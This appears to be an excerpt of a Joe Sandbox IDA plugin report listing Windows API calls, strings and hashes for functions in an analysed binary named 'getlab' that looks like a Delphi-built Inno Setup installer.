                                                                          • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00494FC5), ref: 00494A5B
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 00494A7D
                                                                          • 73A1A480.USER32(00000000,00000000,00494AA7,00494AA0,?,00000000,?,?,00000000), ref: 00494A9A
                                                                          Strings
                                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494A52
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                          • API String ID: 1435929781-222967699
                                                                          • Opcode ID: 2902dc2c583c5dec24c60d58c3a9fd6cff270746e0fce7babd2e3a3436007c92
                                                                          • Instruction ID: 4a1d9e00790e4e8279befe01d539e981fbc0a950f87c09723c3c89301347e02c
                                                                          • Opcode Fuzzy Hash: 2902dc2c583c5dec24c60d58c3a9fd6cff270746e0fce7babd2e3a3436007c92
                                                                          • Instruction Fuzzy Hash: FA015E76A44604AFDB14DBA9CC41E5EB7ECDB48704F610476B604E7281DA78AE008B6C
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F35
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F56
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00418F71
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F92
                                                                            • Part of subcall function 004230C0: 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                                            • Part of subcall function 004230C0: EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                                            • Part of subcall function 004230C0: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                                            • Part of subcall function 004230C0: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                                            • Part of subcall function 00423684: LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                                            • Part of subcall function 00423684: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                                            • Part of subcall function 00423684: OemToCharA.USER32(?,?), ref: 00423754
                                                                            • Part of subcall function 00423684: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                                            • Part of subcall function 0041F110: GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                                            • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                                            • Part of subcall function 0041F110: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                                            • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                          • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                          • API String ID: 3864787166-2767913252
                                                                          • Opcode ID: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                                          • Instruction ID: 27c32735182dabff7e1c09a1de9b3c03b849675df7244bb9ef6d39ac7a5e8d86
                                                                          • Opcode Fuzzy Hash: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                                          • Instruction Fuzzy Hash: 7A11FC70A182409AD704FF66A94275A76E1DB6830CF40853FF448AB391DB39A9458BAF
                                                                          APIs
                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$Prop
                                                                          • String ID:
                                                                          • API String ID: 3887896539-0
                                                                          • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                          • Instruction ID: 2f0da8c2a639c8e1c6f1513ac1b217b7872104ca576cf6b7b6160f367be9faf8
                                                                          • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                          • Instruction Fuzzy Hash: 8C11B775100244BFEF00DF9DDC84EDA37A8EB19364F144666B958DB2A2D738D9908B68
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 00472109
                                                                          • FindClose.KERNEL32(000000FF,00472134,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472127
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 0047222B
                                                                          • FindClose.KERNEL32(000000FF,00472256,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472249
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID: p%G
                                                                          • API String ID: 2066263336-2885399958
                                                                          • Opcode ID: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                                          • Instruction ID: c5c343863c2eea904beb919c2ff7085193d8c56025a8159f133c7515c1d415d1
                                                                          • Opcode Fuzzy Hash: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                                          • Instruction Fuzzy Hash: F4B12B3490424D9FCF11DFA5C981ADEBBB9FF49304F5081AAE908B3251D7789A46CF68
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00455843,?,00000000,00455883), ref: 00455789
                                                                          Strings
                                                                          • WININIT.INI, xrefs: 004557B8
                                                                          • PendingFileRenameOperations2, xrefs: 00455758
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0045570C
                                                                          • PendingFileRenameOperations, xrefs: 00455728
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                          • API String ID: 47109696-2199428270
                                                                          • Opcode ID: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                                          • Instruction ID: 0b70bbd74ac5003506c3e48668489f2f7adcdad68ca58941e5d407b4478d915f
                                                                          • Opcode Fuzzy Hash: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                                          • Instruction Fuzzy Hash: 0C518430E006489FDB10EF61DC51AEEB7B9EF44305F50857BE804A7292DB78AE49CA58
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C40B
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C414
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                          • API String ID: 1375471231-2952887711
                                                                          • Opcode ID: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                                          • Instruction ID: d537758c7117fefc82ee858029cb7c27e5ed8caa62090c64dc1ceeedb24f0412
                                                                          • Opcode Fuzzy Hash: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                                          • Instruction Fuzzy Hash: A0411774A001099BCB01EFA5C892ADEB7B5EF44305F50857BE814B7392DB38AE058B6D
                                                                          APIs
                                                                          • EnumWindows.USER32(00423A14), ref: 00423AA0
                                                                          • GetWindow.USER32(?,00000003), ref: 00423AB5
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                                          • SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnumLongWindows
                                                                          • String ID: TAB
                                                                          • API String ID: 4191631535-3846439302
                                                                          • Opcode ID: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                                          • Instruction ID: 44c8a23491b9c45dd34cf4bcc3c04de93252e86aee0086cff54aee2134896fd7
                                                                          • Opcode Fuzzy Hash: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                                          • Instruction Fuzzy Hash: 7B112A70704610ABDB10DF28D985F5677E8EB08725F51026AF994EB2E3C378AD41CB59
                                                                          APIs
                                                                          • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE48
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFE3,00000000,0042DFFB,?,?,?,?,00000006,?,00000000,00496D69), ref: 0042DE63
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE69
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDeleteHandleModuleProc
                                                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                                                          • API String ID: 588496660-1846899949
                                                                          • Opcode ID: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                                          • Instruction ID: 9c024767392e34e1239b6ccdb0e78e824d69575b4a8d701ce7db5acd733af5c1
                                                                          • Opcode Fuzzy Hash: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                                          • Instruction Fuzzy Hash: B2E06DF1B41B30AAD72426697C8AFA72728DB74365F618537B105AD1A183FC1C50CE9D
                                                                          Strings
                                                                          • PrepareToInstall failed: %s, xrefs: 0046BC8E
                                                                          • NextButtonClick, xrefs: 0046BA6C
                                                                          • Need to restart Windows? %s, xrefs: 0046BCB5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                          • API String ID: 0-2329492092
                                                                          • Opcode ID: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                                          • Instruction ID: ef605359146084d2a330ce9392c81193c54d44d6395a219c566c339d74a55226
                                                                          • Opcode Fuzzy Hash: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                                          • Instruction Fuzzy Hash: F6D12A34A04108DFCB10EF99D585AEE77F5EF49304F6444BAE400AB352D778AE81CB9A
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?,?,00000000,00482990), ref: 0048276C
                                                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482801
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveChangeNotifyWindow
                                                                          • String ID: $Need to restart Windows? %s
                                                                          • API String ID: 1160245247-4200181552
                                                                          • Opcode ID: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                                          • Instruction ID: d92f6dc0c394a11860c555715cc1377d1ab7d31dc5c27e132739ea4afdffe6c1
                                                                          • Opcode Fuzzy Hash: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                                          • Instruction Fuzzy Hash: 5291A274A042049FDB10FB69D986BAD77F4AF55308F1084BBE8009B362D7B86D05CB5D
                                                                          APIs
                                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                          • GetLastError.KERNEL32(00000000,0046FAF9,?,?,0049C1D0,00000000), ref: 0046F9D6
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FA50
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FA75
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                          • String ID: Creating directory: %s
                                                                          • API String ID: 2451617938-483064649
                                                                          • Opcode ID: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                                          • Instruction ID: 2bd83b05653ced0f0f619092410e1b81403e7cd9e02354fb4b3544f6b0b1216d
                                                                          • Opcode Fuzzy Hash: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                                          • Instruction Fuzzy Hash: 0F512174E00248ABDB01DFE9D582BDEBBF5AF48304F50847AE844B7396D7785E088B59
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E56
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F1C), ref: 00454EC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressByteCharMultiProcWide
                                                                          • String ID: SfcIsFileProtected$sfc.dll
                                                                          • API String ID: 2508298434-591603554
                                                                          • Opcode ID: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                                          • Instruction ID: 176d29f9623cbc30a6d26dfc77e51d4098360506d5c3757ea1f9e8bf8263b863
                                                                          • Opcode Fuzzy Hash: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                                          • Instruction Fuzzy Hash: 21416670A04218ABE720EB55DC86B9E77B8EB44309F5041B7E908A7293D7785F89CF5C
                                                                          APIs
                                                                          • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                          • API String ID: 395431579-1506664499
                                                                          • Opcode ID: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                                          • Instruction ID: abd39ea96fbc8e8598eec473428a27bf92d63543bd8a2491ee7d7de58c90140d
                                                                          • Opcode Fuzzy Hash: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                                          • Instruction Fuzzy Hash: B1117330B00319BFD711EB62ED85B8E7BA8EB55704F90407BF400A6691D778AE05865D
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,00455A4F,?,00000001,00000000), ref: 00455A42
                                                                          Strings
                                                                          • PendingFileRenameOperations, xrefs: 00455A14
                                                                          • PendingFileRenameOperations2, xrefs: 00455A23
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004559F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                          • API String ID: 47109696-2115312317
                                                                          • Opcode ID: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                                          • Instruction ID: 0e3b4bd859061d9736a48b3f0c398de546ea7d73752f370084b2b16911b021d7
                                                                          • Opcode Fuzzy Hash: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                                          • Instruction Fuzzy Hash: 31F09671744A08EFDB04D6A6DC62E7A739DD744711FA04477F800D7682DA7DAD04962C
